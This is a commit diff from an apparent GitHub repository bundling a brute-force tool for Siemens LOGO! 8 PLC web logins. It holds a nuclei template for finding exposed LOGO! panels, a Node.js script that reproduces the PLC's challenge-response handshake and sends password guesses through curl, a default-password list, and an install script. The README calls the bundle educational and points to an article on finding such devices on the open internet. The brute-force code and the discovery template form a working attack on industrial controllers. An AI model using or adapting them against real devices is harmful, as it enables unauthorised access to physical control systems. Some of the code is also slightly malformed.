added installation script for the requirements

LOGO.yaml

@@ -0,0 +1,21 @@
+id: Detect_Siemens_LOGO_8_PLC
+
+info:
+  name: find up simeens logo! 8 web panel
+  author: biero-el-corridor
+  severity: low
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"/logo_login.shtm?!App-Language=
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+           - 200
+           condition: and
+      - type: word
+        part: body
+            - "ReadMe OSS"

README.md

@@ -1,24 +1,37 @@
-# SIEMENS LOGO! Brute Force tool
-![alt text](https://raw.githubusercontent.com/yossireuven/LOGO_BF/master/LOGO8.png)
+# SIEMENS LOGO! Brute Force Bundle
 
+![alt text](https://raw.githubusercontent.com/biero-el-corridor/LOGO_BRUTE_FORCE_BUNBLE/master/picture/nuclei_result.png)
+![alt text](https://raw.githubusercontent.com/biero-el-corridor/LOGO_BRUTE_FORCE_BUNBLE/master/picture/LOGO_Bruteforce.png)
 
-### Motivation: 
-SIEMENS LOGO! Web Server using 2-step authentication:
-1. Initialize integers using several arithmetic functions, send to server and get TOKEN & KEY.
-2. Create another key using the recived KEY and webpage password and send to server for verification, and on success receive login TOKEN (another) from server.
 
-This auth method makes known brute force tools (Hydra, Medusa, ...) to not work well.
-So I've decided to create my own brute-force tool :-).
+### About
+_*!!!!! This repos is for research and educational purposes only !!!!!*_
 
-### Requirments: 
+This repo is based on the work of yossi-reuven. It only adds a port selection and better management of the password list (in the js file).
+
+There is also a small pass list and a nuclei template which should do the job for research work ;).
+
+For obvious reasons, I did not add the fact of being able to put a list of IPs as a parameter.
+
+For a concrete example, read [this article](https://medium.com/@biero-llagas/hunt-and-bruteforce-plc-simens-logo-225bad0088db) which explains how to use this tool in a concrete case: the discovery of LOGO! in the wild internet. Followed by the brute force of a LOGO! on LAN in my local network.
+
+
+### Requirements: 
 - Node JS 
-- shelljs (npm install shelljs)   
+- shelljs (`npm install shelljs`)   
+- nuclei (check https://docs.projectdiscovery.io/tools/nuclei/install)
+- a disposable SIEMENS LOGO! 
+
+You can install everything by cloning the repository and running the following commands : 
+```
+git clone https://github.com/biero-el-corridor/LOGO_BRUTE_FORCE_BUNBLE.git
+cd LOGO_BRUTE_FORCE_BUNBLE
+chmod +x *.sh
+./requirements.sh
+```
 
 ### Usage: 
-node LOGO_bf.js  <logo_ip> <pass_file>
-
-*no need for username as SIEMENS has static username ('Web User')
-
+`node LOGO_bf.js  <logo_ip> <port> <pass_file>` 
 
+Note : no need for username as SIEMENS has static username ('Web User')
 
-#### - For educational and research purposes only.

logo_bf.js

@@ -33,7 +33,7 @@ function LoginHandler(oTracer, resp) {
       var iPasswordToken = (MakeCRC32(String2UTF8(sPasswordToken)) ^ m_iKey2) >>> 0;
       var iServerChallengeToken = (oTracer.m_iKey1A1 ^ oTracer.m_iKey1A2 ^ oTracer.m_iKey1B1 ^ oTracer.m_iKey1B2 ^ m_iKey2) >>> 0;
       var Str_ = "UAMLOGIN:Web User" + "," + iPasswordToken + "," + iServerChallengeToken;
-      var command = `curl -s -k -X POST -H "Host: ${HOST}" -H "User-Agent: ${USERAGENT}" -H "Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Referer: http://${HOST}/logo_login.shtm?!App-Language=1" -H "App-Language: 1" -H "Security-Hint: ${m_sRef}" -H "Content-Type: text/plain;charset=UTF-8" -H "Connection: close" --data-binary "${Str_}" "http://${HOST}/AJAX"`
+      var command = `curl -s -k -X POST -H "Host: ${HOST}:${PORT}" -H "User-Agent: ${USERAGENT}" -H "Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Referer: http://${HOST}:${PORT}/logo_login.shtm?!App-Language=1" -H "App-Language: 1" -H "Security-Hint: ${m_sRef}" -H "Content-Type: text/plain;charset=UTF-8" -H "Connection: close" --data-binary "${Str_}" "http://${HOST}:${PORT}/AJAX"`
       var out2 = child_process.execSync(command, function(error, stdout, stderr){
       if(error !== null){console.log('exec error: ' + error);}
       });
@@ -52,7 +52,7 @@ function Login(oTracer) {
     oTracer.m_oPrivateKey1A = DESMakeKey(oTracer.m_iKey1A1, oTracer.m_iKey1A2);
     oTracer.m_oPrivateKey1B = DESMakeKey(oTracer.m_iKey1B1, oTracer.m_iKey1B2);
     var Str_ = "UAMCHAL:" + "3,4," + oTracer.m_iKey1A1 + "," + oTracer.m_iKey1A2 + "," + oTracer.m_iKey1B1 + "," + oTracer.m_iKey1B2;
-    var command = `curl -s -k -X POST -H "Host: ${HOST}" -H "User-Agent: ${USERAGENT}" -H "Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Referer: http://${HOST}/logo_login.shtm?!App-Language=1" -H "App-Language: 1" -H "Security-Hint: p" -H "Content-Type: text/plain;charset=UTF-8" -H "Connection: close" --data-binary "${Str_}" "http://${HOST}/AJAX"`
+    var command = `curl -s -k -X POST -H "Host: ${HOST}}:${PORT}" -H "User-Agent: ${USERAGENT}" -H "Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Referer: http://${HOST}:${PORT}/logo_login.shtm?!App-Language=1" -H "App-Language: 1" -H "Security-Hint: p" -H "Content-Type: text/plain;charset=UTF-8" -H "Connection: close" --data-binary "${Str_}" "http://${HOST}:${PORT}/AJAX"`
     var out1 = child_process.execSync(command, function(error, stdout, stderr){
     if(error !== null){console.log('exec error: ' + error);}
     });
@@ -169,7 +169,8 @@ function GetCredsFile(path){
 
 StartPrint();
 var HOST = process.argv[2];
-var passwords = GetCredsFile(process.argv[3]);
+var PORT = process.argv[3]
+var passwords = GetCredsFile(process.argv[4]);
 var passwordsLength = passwords.length;
 for (var i = 0; i < passwordsLength-1; i++) {
   space_len = new Array(Math.max(0, 9 - passwords[i].length) + 13 - Math.max(0,passwords[i].length - 9)).join(' ');

pass.txt

@@ -0,0 +1,35 @@
+logo
+LoGo
+l@g@
+L@G@
+LOGO
+LOGO123
+logo123
+LoGo123
+LOGO123
+l@g@123
+L@G@123
+admin
+root
+nc11
+user
+enable
+0
+22
+default
+2Wire
+Administrator
+guest
+tech
+blank
+debug
+support
+docker
+!root
+ubtn
+1024
+telecomadmin
+MikroTik
+admin1
+profile1
+user1

requirements.sh

@@ -0,0 +1,29 @@
+#!/bin/bash
+
+# Go installation
+echo "Installing Go..."
+GO_VERSION="1.21.3"
+wget https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz -O go${GO_VERSION}.linux-amd64.tar.gz
+sudo rm -rf /usr/local/go
+sudo tar -C /usr/local -xzf go${GO_VERSION}.linux-amd64.tar.gz
+export PATH=$PATH:/usr/local/go/bin
+go version || { echo "Go installation failed!"; exit 1; }
+
+# Install Nuclei
+echo "Installing Nuclei..."
+if grep -q "kali" /etc/os-release; then
+    sudo apt update && sudo apt install -y nuclei
+else
+    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest || { echo "Nuclei installation failed!"; exit 1; }
+fi
+
+# Install Node.js and ShellJS
+echo "Installing Node.js and ShellJS..."
+if ! command -v node &> /dev/null; then
+    curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
+    sudo apt update && sudo apt install -y nodejs
+fi
+
+npm install shelljs || { echo "ShellJS installation failed!"; exit 1; }
+
+echo "Installation complete"